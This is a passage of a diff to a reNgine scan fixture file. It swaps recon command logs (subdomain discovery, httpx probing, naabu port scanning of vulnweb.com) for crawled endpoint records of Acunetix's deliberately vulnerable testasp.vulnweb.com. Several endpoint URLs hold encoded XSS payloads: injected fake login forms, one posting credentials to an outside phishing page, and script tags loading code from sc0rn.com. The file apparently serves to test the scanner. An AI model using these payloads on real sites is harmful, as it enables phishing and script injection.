"target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EBitte%2Bloggen%2BSie%2Bsich%2Bein%2Bbevor%2BSie%2B%2Bfortfahren%3A%2B%253Cform%2Baction%2B%253D%2522destination%2Eaps%2522%253E%253Ctable%253E%2B%253Ctr%253E%2B%253Ctd%253ELogin%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253C%2Ftd%253E%2B%253C%2Ftr%253E%2B%253Ctr%253E%2B%253Ctd%253EPasswort%3A%253C%2Ftd%253E%2B%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253C%2Ftd%253E%2B%253C%2Ftr%253E%253C%2Ftable%253E%2B%253Cinput%2Btype%253Dsubmit%2Bvalue%253Dlogin%253E%253C%2Fform%253E", + "content_length": 4380, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:34.105Z", + "response_time": 0.361359906, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, { - "model": "startScan.command", - "pk": 32, + "model": "startScan.endpoint", + "pk": 103, "fields": { "scan_history": 1, - "activity": 1, - "command": "netlas search -d domain -i domain domain:\"*.vulnweb.com\" -f json | grep -oE '([a-zA-Z0-9]([-a-zA-Z0-9]*[a-zA-Z0-9])?\\.)+vulnweb.com' > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/subdomains_netlas.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:28:08.941Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252F", + "content_length": 3618, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:34.222Z", + "response_time": 0.34098262999999995, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 33, + "model": "startScan.endpoint", + "pk": 104, "fields": { "scan_history": 1, - "activity": 1, - "command": "cat /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/subdomains_*.txt > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/#1_subdomain_discovery.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:28:09.587Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%25253", + "content_length": 3658, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:34.337Z", + "response_time": 0.35726549, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 34, + "model": "startScan.endpoint", + "pk": 105, "fields": { "scan_history": 1, - "activity": 1, - "command": "sort -u /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/#1_subdomain_discovery.txt -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/#1_subdomain_discovery.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:28:09.592Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C", + "content_length": 3828, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:34.450Z", + "response_time": 0.357012728, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 35, + "model": "startScan.endpoint", + "pk": 106, "fields": { "scan_history": 1, - "activity": 3, - "command": "httpx -cl -ct -rt -location -td -websocket -cname -asn -cdn -probe -random-agent -t 30 -json -l /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/httpx_input.txt -silent", - "return_code": 0, - "output": "{\"timestamp\":\"2024-09-03T21:28:10.479003156Z\",\"url\":\"http://localhost.vulnweb.com\",\"input\":\"localhost.vulnweb.com\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.770588207Z\",\"url\":\"http://edu-rost.ruwww.vulnweb.com\",\"input\":\"edu-rost.ruwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.770698494Z\",\"url\":\"http://test.vulnweb.com\",\"input\":\"test.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.772639921Z\",\"url\":\"http://tetphp.vulnweb.com\",\"input\":\"tetphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.773795126Z\",\"url\":\"http://blogger.com.vulnweb.com\",\"input\":\"blogger.com.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.774028924Z\",\"url\":\"http://testaps.vulnweb.com\",\"input\":\"testaps.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.774314729Z\",\"url\":\"http://test.php.vulnweb.com\",\"input\":\"test.php.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.778213954Z\",\"url\":\"http://u003erest.vulnweb.com\",\"input\":\"u003erest.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.779635989Z\",\"url\":\"http://u003etestasp.vulnweb.com\",\"input\":\"u003etestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.779901386Z\",\"url\":\"http://5burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"input\":\"5burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.782169265Z\",\"url\":\"http://testap.vulnweb.com\",\"input\":\"testap.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.783045016Z\",\"url\":\"http://testpphp.vulnweb.com\",\"input\":\"testpphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.783385584Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com\",\"input\":\"testphp.vulnweb.com\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"345.110429ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T21:28:20.783891311Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com\",\"input\":\"testhtml5.vulnweb.com\",\"title\":\"SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"342.381867ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":1483,\"lines\":164,\"status_code\":200,\"content_length\":6940,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T21:28:20.79672208Z\",\"url\":\"http://testapsnet.vulnweb.com\",\"input\":\"testapsnet.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.797297117Z\",\"url\":\"http://antivirus1.vulnweb.com\",\"input\":\"antivirus1.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.797526076Z\",\"url\":\"http://testaspx.vulnweb.com\",\"input\":\"testaspx.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.798569381Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com\",\"input\":\"testasp.vulnweb.com\",\"title\":\"acuforum forums\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/\",\"time\":\"361.175397ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":328,\"lines\":46,\"status_code\":200,\"content_length\":3537,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T21:28:20.801057773Z\",\"url\":\"http://httptestaspnet.vulnweb.com\",\"input\":\"httptestaspnet.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.805003305Z\",\"url\":\"http://ttestphp.vulnweb.com\",\"input\":\"ttestphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.805102451Z\",\"url\":\"http://2f-2fwww.vulnweb.com\",\"input\":\"2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.806546145Z\",\"url\":\"http://odincovo.vulnweb.com\",\"input\":\"odincovo.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.808176239Z\",\"url\":\"http://2fwww.vulnweb.com\",\"input\":\"2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.808798495Z\",\"url\":\"http://7ctestasp.vulnweb.com\",\"input\":\"7ctestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.80931386Z\",\"url\":\"http://estphp.vulnweb.com\",\"input\":\"estphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.812391837Z\",\"url\":\"http://restasp.vulnweb.com\",\"input\":\"restasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.814600876Z\",\"url\":\"http://2ftestasp.vulnweb.com\",\"input\":\"2ftestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.822120875Z\",\"url\":\"http://virus.vulnweb.com\",\"input\":\"virus.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.83703144Z\",\"url\":\"http://edu-rost.rutestasp.vulnweb.com\",\"input\":\"edu-rost.rutestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:20.856906486Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com\",\"input\":\"rest.vulnweb.com\",\"title\":\"Acunetix Vulnerable REST API\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"35.81.188.86\",\"path\":\"/\",\"time\":\"422.205408ms\",\"a\":[\"35.81.188.86\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\",\"PHP:7.1.26\"],\"words\":1397,\"lines\":138,\"status_code\":200,\"content_length\":3555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T21:28:20.992940938Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com\",\"input\":\"testaspnet.vulnweb.com\",\"title\":\"acublog news\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/\",\"time\":\"535.234499ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":774,\"lines\":89,\"status_code\":200,\"content_length\":14082,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T21:28:21.214887749Z\",\"url\":\"http://www.testphp.vulnweb.com\",\"input\":\"www.testphp.vulnweb.com\",\"error\":\"no address found for host\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:21.224643226Z\",\"url\":\"http://www.testasp.vulnweb.com\",\"input\":\"www.testasp.vulnweb.com\",\"error\":\"no address found for host\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:31.115507511Z\",\"url\":\"http://www.test.php.vulnweb.com\",\"input\":\"www.test.php.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:31.121278393Z\",\"url\":\"http://www.virus.vulnweb.com\",\"input\":\"www.virus.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-09-03T21:28:31.13080372Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com\",\"input\":\"vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"352.853777ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T21:28:31.13762029Z\",\"port\":\"80\",\"url\":\"http://www.vulnweb.com\",\"input\":\"www.vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"352.635869ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-09-03T21:28:31.142479444Z\",\"url\":\"http://viruswall.vulnweb.com\",\"input\":\"viruswall.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n", - "time": "2024-09-03T21:28:09.749Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinp", + "content_length": 4000, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:34.566Z", + "response_time": 0.35254744299999996, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 36, + "model": "startScan.endpoint", + "pk": 107, "fields": { - "scan_history": null, - "activity": null, - "command": "geoiplookup 44.238.29.244", - "return_code": null, - "output": null, - "time": "2024-09-03T21:28:20.894Z" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Byour%2Bform%2Bfacebbok%2Bbelow%2Bbefore%2Bproceeding%3A%253Cform%2Baction%253D%2522http%3A%2F%2Fwww%2Evineyarddowntown%2Eorg%2Fpdf%2Fphish%2Ephp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dlogin%253E%253C%2Ftd%253E%253C%2Ftr%253E%253Ctr%253E%253Ctd%253EPassword%3A%253C%2Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%2Ftd%253E%253C%2Ftr%253E%253C%2Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%253DLOGIN%253E%253C%2Fform%253E", + "content_length": 4448, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:34.679Z", + "response_time": 0.357419856, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 37, + "model": "startScan.endpoint", + "pk": 108, "fields": { - "scan_history": null, - "activity": null, - "command": "geoiplookup 35.81.188.86", - "return_code": null, - "output": null, - "time": "2024-09-03T21:28:20.945Z" + "scan_history": 1, + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fcfy%2Ejs%2522%253E%253C%252Fscript%253E", + "content_length": 3404, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:34.795Z", + "response_time": 0.358372626, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 38, + "model": "startScan.endpoint", + "pk": 109, "fields": { "scan_history": 1, - "activity": 3, - "command": "rm /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/httpx_input.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:28:31.181Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fsc%2Ejs%2522%253E%253C%252Fscript%253E", + "content_length": 3402, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:34.937Z", + "response_time": 0.340041997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 39, + "model": "startScan.endpoint", + "pk": 110, "fields": { "scan_history": 1, - "activity": 4, - "command": "naabu -json -exclude-cdn -list /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/input_subdomains_port_scan.txt -top-ports 100 -c 30 -rate 150 -timeout 5000 -silent", - "return_code": 0, - "output": "\n__\n___ ___ ___ _/ / __ __\n/ _ \\/ _ \\/ _ \\/ _ \\/ // /\n/_//_/\\_,_/\\_,_/_.__/\\_,_/\n\nprojectdiscovery.io\n\n[INF] Current naabu version 2.3.0 (outdated)\n{\"host\":\"rest.vulnweb.com\",\"ip\":\"35.81.188.86\",\"timestamp\":\"2024-09-03T21:28:34.852197905Z\",\"port\":8080,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testasp.vulnweb.com\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-09-03T21:28:38.833012077Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testaspnet.vulnweb.com\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-09-03T21:28:38.833058584Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"rest.vulnweb.com\",\"ip\":\"35.81.188.86\",\"timestamp\":\"2024-09-03T21:28:39.816853087Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846295137Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"2ftestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846355841Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"5burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846373614Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"7ctestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846384815Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"antivirus1.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846391618Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"blogger.com.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846396848Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"edu-rost.rutestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846400745Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"edu-rost.ruwww.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846405213Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"estphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846411675Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"httptestaspnet.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846415963Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"odincovo.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846419801Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"restasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846423748Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"test.php.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846428026Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"test.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846438285Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testap.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846442483Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testaps.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.84644639Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testapsnet.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846450137Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testaspx.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846456559Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testhtml5.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846461439Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846469183Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"testpphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846474944Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"tetphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846479302Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"ttestphp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.84648337Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u003erest.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846487688Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u003etestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846492607Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"virus.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.8464998Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"viruswall.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846504209Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"www.test.php.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846508697Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"www.virus.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-09-03T21:28:39.846512795Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n", - "time": "2024-09-03T21:28:31.494Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%2520src%3D%2522http%3A%2F%2Fsc0rn%2Ecom%2Fnip%2Ejs%2522%253E%253C%252Fscript%253E", + "content_length": 3404, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:35.107Z", 